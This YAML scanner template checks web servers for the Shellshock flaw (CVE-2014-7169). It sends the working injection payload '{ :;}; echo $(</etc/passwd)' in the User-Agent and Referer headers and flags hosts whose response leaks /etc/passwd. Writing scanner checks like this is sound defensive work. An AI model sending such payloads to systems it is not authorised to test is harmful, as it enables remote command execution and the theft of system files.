id: shellshock-rce
info:
  name: Shellshock RCE CVE-2014-7169
  risk: Critical

params:
  - root: '{{.BaseURL}}'

requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}/cgi-bin/status
    headers:
      - User-Agent: "{ :;}; echo $(</etc/passwd)"
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "root:") && StringSearch("response", "bin/bash") && !StringSearch("response", " VMware Network")

  - method: GET
    redirect: false
    url: >-
      {{.root}}/cgi-bin/status
    headers:
      - Referer: "{ :;}; echo $(</etc/passwd)"
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "root:") && StringSearch("response", "bin/bash") && !StringSearch("response", " VMware Network")
